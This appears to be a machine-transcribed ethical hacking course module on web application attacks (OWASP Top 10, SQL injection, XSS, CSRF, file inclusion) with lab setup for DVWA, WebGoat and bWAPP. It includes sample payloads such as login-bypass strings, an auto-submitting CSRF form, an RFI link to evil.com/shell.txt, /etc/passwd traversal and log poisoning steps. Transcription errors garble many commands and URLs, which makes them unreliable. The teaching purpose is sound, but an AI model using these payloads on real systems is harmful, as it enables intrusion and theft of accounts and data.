Module 7, Web Application Hacking, Introduction. Welcome back, future ethical hackers. You've scanned networks, exploited vulnerabilities, and gained access. Now it's time to go web deep. In Module 7, we're diving into one of the most in-demand and highly targeted areas in cybersecurity: web application hacking. Whether it's a login page, shopping cart, or admin dashboard, web apps are everywhere, and so are their weaknesses. What you'll learn in this module: OWASP Top 10, the most common and dangerous vulnerabilities in web apps, updated regularly by security experts. SQL injection, cross-site scripting, XSS, CSRF, file inclusion. You'll not only understand these, but exploit and patch them like a pro. Master this powerful web proxy tool to intercept, manipulate, and test HTTP requests manually. Hands-on labs. Use platforms like DVWA, WebGoat, and Hack the Box to practice your skills safely and legally. Why it matters most: companies today rely on web apps to operate, and attackers know it. Learn how to find and fix flaws, improve application security, boost your resume with real-world skills. Are you ready to break, test, and secure the web? Let's begin Module 7, Web Application Hacking. Module 7.1, Understanding the OWASP Top 10. Welcome to Module 7.1, where we start our journey into web application hacking by exploring the OWASP Top 10, the industry's most trusted list of critical web security risks. Whether you're securing apps or hacking ethically, knowing these top threats is non-negotiable. What is OWASP? OWASP stands for the Open Worldwide Application Security Project, a nonprofit, community-driven organization that publishes security best practices, especially for web applications. Their most famous project, the OWASP Top 10, updated every few years with the most widespread and critical web vulnerabilities. The OWASP Top 10, 2021 edition. Let's briefly overview each of these. 1. Broken access control. Users can act outside their intended permissions, e.g., regular user accessing admin features. 2. Cryptographic failures, formerly sensitive data exposure, weak or no encryption of sensitive data, e.g. passwords or credit card info in plain text. 3. Injection, SQL, NoSQL, OS, and LDAP injection flaws, e.g. entering SQL code in login fields. 4. Insecure design, poor architectural choices, security wasn't considered in planning. 5. Security misconfiguration, default passwords, open ports, verbose error messages, very common and easy to fix. 6. Vulnerable and outdated components, using old libraries, plugins, or frameworks, can lead to remote code execution. 7. Identification and authentication failures, broken login systems, e.g., weak password enforcement or session hijacking. 8. Software and data integrity failures, trusting software updates from insecure sources, e.g. supply chain attacks. 9. Security logging and monitoring failures, no alerts or logs for suspicious activity, can delay breach detection. 10. Server-side request forgery, SSRF, server fetches unauthorized or malicious URLs, e.g. fetching metadata services inside cloud environments. Why the OWASP Top 10 matters: helps you focus on real-world threats, used by companies, auditors, and developers globally, forms the backbone of secure coding and pen testing checklists. Summary. In this lesson you learned what OWASP is and why it's important, the top 10 web vulnerabilities that hackers and security pros watch for, how these apply to real web apps. Next, in 7.2, we'll go hands-on with SQL Injection, the legendary web hack that still works today. Ready? Let's get hacking. Module 7.2, SQL Injection, the classic web attack. Welcome back, ethical hackers. In Module 7.2, we're diving into SQL Injection, one of the most famous, powerful, and still common vulnerabilities in web applications. By the end of this session, you'll understand how SQLi works and how to identify, test, and exploit it safely in labs. What is SQL Injection? SQL injection occurs when user input is improperly sanitized and gets executed as part of an SQL query. Attackers can bypass login forms, read sensitive data from databases, modify or delete data, even gain full access to the system. Real-world example. Imagine this insecure SQL query in a login form. SQL select from users, where username equals user and password equals pass. If a hacker enters plaintext username admin, password, or 1 equals 1, the query becomes SQL select char from users, where username equals admin and password equals, or 1 equals 1. The condition 1 equals 1 is always true, allowing login without the correct password. Types of SQL injection. 1. Classic in-band, immediate results in the response. 2. Blind SQLi, no visible error infer via behavior. 3. Time-based blind, use delays to confirm injection full 4. Out of band, use DNS or HTTP requests to receive data externally. Testing for SQLi. Try injecting plaintext or 1 equals 1 or A equals A. If the page behaves differently or errors out, SQLi might be possible. Tools like SQL Map, Burp Suite, for educational use, can automate detection and exploitation. Hands-on lab example, DVWA. In Damn Vulnerable Web App DVWA, navigate to SQLi section and try plaintext 1 or 1 equals 1. Watch how the app leaks data or bypasses logic. How to prevent SQL injection. Use parameterized queries, prepared statements, escape and sanitize all user inputs, use ORMs, object relational mappers, when possible. Implement WAFs, web application firewalls, least privileged database access, no root. Summary. In this lesson, you learned what SQL injection is and how it works, the different types, classic, blind, time-based, out-of-band, how to test for SQLi in web apps, real tools and lab exercises, how to defend against it in production. Next up in 7.3, we'll explore another deadly web flaw, cross-site scripting, XSS, stealing cookies, injecting scripts, and more. Let's go deeper into web hacking. Hashtag Module 7.3, Cross-Site Scripting, XSS. Welcome back, ethical hackers. In this module, we're diving into cross-site scripting, XSS, one of the most dangerous client-side attacks on the web, and a key entry in the OWASP Top 10. You'll learn what XSS is, the types of XSS attacks, how to detect and exploit XSS, how to defend web apps from it. What is XSS? Cross-site scripting allows attackers to inject malicious JavaScript into websites. It targets users, not servers, to steal cookies, session tokens, redirect users to malicious sites, perform actions on behalf of the user, session hijacking. Types of XSS. 1. Stored XSS, persistent. Malicious code is saved in the database, triggered when users visit infected pages. 2. Reflected XSS. Payload is reflected via URL or form data, no database storage, executed on user interaction. 3. DOM-based XSS. Manipulates client-side scripts or DOM, exploits JS functions like inner HTML, document example, reflected XSS. HTML URL, h/example.com/search script alert XSS. If the web page prints Q without sanitization, HTML you searched for script alert XSS. JavaScript executes XSS triggered. Testing for XSS. Try injecting common payloads, HTML alert, img *x, 1 error equals alert, svg onload. If the alert box pops up, you're in. Use tools like Burp Suite, Pro and Community, XSS Strike, OWASP Zap. Also practice with vulnerable apps like DVWA, WebGoat, XSS Game by Google. How to prevent XSS. Escape output, HTML encode. Use content security policy, CS. Avoid using inner HTML, sanitize user input using libraries. Use modern frameworks with auto-sanitization, React, Angular. Real-world impact. Facebook, Google, and PayPal have all patched XSS bugs reported via bug bounties. In 2020, over 65% of bug bounty reports involved XSS. It's everywhere, and profitable to discover. Summary. You just learned what XSS is and how it impacts users, the 3 types of XSS, how to detect, exploit, and defend against XSS, tools and labs for hands-on learning. Next up in 7.4, we'll explore CSRF, cross-site request forgery, where attackers trick users into performing actions without consent. You're becoming a web security warrior. Module 7.4, cross-site request forgery. Welcome back, hackers in training. In this lesson, we're diving into one of the most deceptively dangerous web vulnerabilities, CSRF, or cross-site request forgery. It's not about stealing data like XSS. It's about tricking users into making unauthorized requests. Let's break it down. What is CSRF? CSRF occurs when a malicious site tricks a logged-in user into performing an unintended action on a trusted web app without their consent. The attacker exploits the trust that a website has in a user's browser session. Real-world example. Imagine a user is logged into their bank account. Then they visit a malicious site that secretly triggers HTML img /spank.com/transfer to hacker. Boom. Money is transferred without user interaction. Why? Because the BUR automatically includes cookies or session tokens. Key concepts of CSRF relies on the victim being authenticated, logged in. Attacks happen via GET or POST requests. Users don't see anything happen, usually done through hidden forms, auto-submitting scripts, or image tags. Basic CSRF attack demo, HTML form action targetsite.com/change email method email, input type hidden email value attacker@example.com. Script document.form submit. This form auto-submits when the page loads. If the user is logged into targetsite.com, their email gets changed. How to test for CSRF. Use Burp Suite to intercept and clone sensitive requests. Craft fake forms using stolen cookies or endpoints. Try changing post data while keeping the victim logged in. Tools. OWASP Zap, Burp Suite with CSRF POC generator extension, DVWA WebGoat, Portswigger Labs. How to prevent CSRF. Use anti-CSRF tokens. Ensure same-site cookie policies. Verify referrer headers. Use CAPTCHAs for sensitive actions. Require re-authentication for critical functions. Frameworks like Django, Laravel, and Spring already include built-in CSRF protection. Summary. In this module, we covered what CSRF is and how it works, real-world impact and examples, how to perform CSRF attacks for ethical testing, mitigation techniques developers must implement. Next, in 7.5, we'll jump into file inclusion vulnerabilities, where attackers can read or execute files on the server. Getting more powerful, aren't we? Module 7.5, File Inclusion Vulnerabilities, LFI and RFI. Welcome back, hacker. In this module, we're exploring file inclusion vulnerabilities, a powerful technique often leading to arbitrary code execution, information disclosure, or even remote access. Let's break it into two types: LFI, local file inclusion, remote file inclusion. Both occur when a web app dynamically loads files based on user input without proper validation. What is LFI? LFI lets attackers trick the server into loading local files, like /etc/passwd. Example URL, http:/example.com/index/htpasswd. If the app includes $, get page directly in a file path, PHP include get page. Then attackers can traverse directories and read sensitive files. What is RFI? RFI allows remote file loading from an external server, hcexample.com/index.page/evil.com/shell.txt. If PHP's allow URL include is enabled, the attacker's file gets executed, leading to remote code execution. Real-world impact, accessing sensitive files, e.g. EC pass logs, code execution via uploaded PHP shells, session hijacking or credential theft, privilege escalation. Testing for LFI. Try inserting these payloads. Page equals //passwd, page php/filter convert.base64-encode /source SQL index, page glosh apache access.log. Combine with log poisoning. 1. Inject malicious PHP code via user agent. 2. Access log file via LFI. 3. Code gets executed. Tools for LFI RFI testing. Burp Suite, fuzzing file paths. WFuzz, brute force directories. LFI Suite, automated LFI detection. Comics, if LFI leads to command injection. How to prevent file inclusion vulnerabilities. Never trust user input. Whitelist allowed files. Use static includes, include header.php. Disable allow URL include in php.ini. Sanitize and validate all input. Fun fact: LFI-RC is often possible by uploading a file, poisoning server logs, including temp files, so always check if LFI can be chained into something worse. Summary. In this lesson you learned the difference between LFI and RFI, how to detect and exploit file inclusion bugs, real-world examples and high-impact attacks, how to secure apps against these vulnerabilities. Next, in 7.6, we'll learn how to test real vulnerable apps like DVWA, WebGoat, and BibWAP using Burp Suite and manual payloads. Ready to practice? Let's go. Module 7.6, Vulnerable Web Apps, DVWA, WebGoat, and BWAP. Welcome back, future pen tester. You've now learned all the core web application attacks: SQL Injection, XSS, CSRF, and file inclusion. Now it's time to practice those skills in a safe, legal lab environment using intentionally vulnerable applications. DVWA, Damn Vulnerable Web Application, WebGoat by OWASP, BWAP, Buggy Web App. Let's get started. Why use vulnerable web apps? These apps are designed for learning how real-world bugs work, practicing exploitation safely, testing automated tools like Burp Suite, OWASP Zap, and more, preparing for certifications like CEH, OSCP, etc. Tool 1, DVWA, Damn Vulnerable Web Application. DWA is a PHP tool app that simulates SQL injection, XSS, CSRF, command injection file upload, comes with difficulty levels, low, medium, high, impossible, perfect for beginner to intermediate learners. Set up bash git clone hts github.com /dwa cd dvwa docker compose upd or use zamp piece lamp stack. Login username admin password. Tool 2. WebGoat is a deliberately insecure Java web app, real-world scenarios, developer-focused vulnerabilities, built-in step-by-step lessons. Setup: bash docker pull WebGoat, docker run -p 808080 WebGoat access -p 8080 /% Tool 3. BWAP, Buggy Web Application. BWAP supports over 100 plus vulnerabilities, includes SQLi, XSS, RFI, SSRF, XXE, HTML5 attacks, clickjacking, cores, etc. Great for automated tool testing. Can integrate with bbox VM pre-configured. Set up bash git clone http://github.com/rachis cd_bwap. Run in XAMPP or Docker for best results. Practice workflow 1. Launch app, DVWA WebGoat BWAP. 2. Identify vulnerability, use browser burp. 3. Attempt manual exploitation. 4. Validate and report findings. 5. Try with tools like SQL Map, XSS Strike, etc. Actual important ethics reminder. These apps are for local use only. Never deploy them on public servers. Practice only in lab networks. Summary. In this hands-on lesson, you set up DVWA, WebGoat and Goat, and BWAP, learned how to launch and log in, practiced real attack scenarios, got ready for advanced testing. Congratulations, Web Warrior. You've just wrapped up one of the most powerful modules in your ethical hacking journey, web application hacking, where we target real-world vulnerabilities that exist in the wild. Let's quickly recap what you've learned, what you've mastered. The OWASP top 10 threats every hacker and defender must know. Attacks like SQL Injection, XSS, CSRF, and file inclusion. Hands-on testing with Burp Suite. Training on vulnerable web applications like DVWA, WebGoat, and more. Bonus, we already solved the DVWA Damn Vulnerable Web App lab step by step. Check out the full video on our YouTube channel now. Link in description. Responsibility reminder. With great power comes great responsibility. Now that you know how to break things, use your power to secure systems. Never test systems you don't own or have permission to access. Use legal labs, CTFs, and authorized targets only. Report findings ethically and professionally. Coming up next, Module 8, System Hacking. In the next module, we go deeper inside the machine, exploiting operating systems, privilege escalation, password cracking, and covering tracks like a pro. Final words. If you enjoyed this module, drop a comment on what blew your mind. Share this with your cybersecurity squad. Subscribe and enable notifications. The next module is... See you in Module 8, System Hacking. Let's own the system, ethically.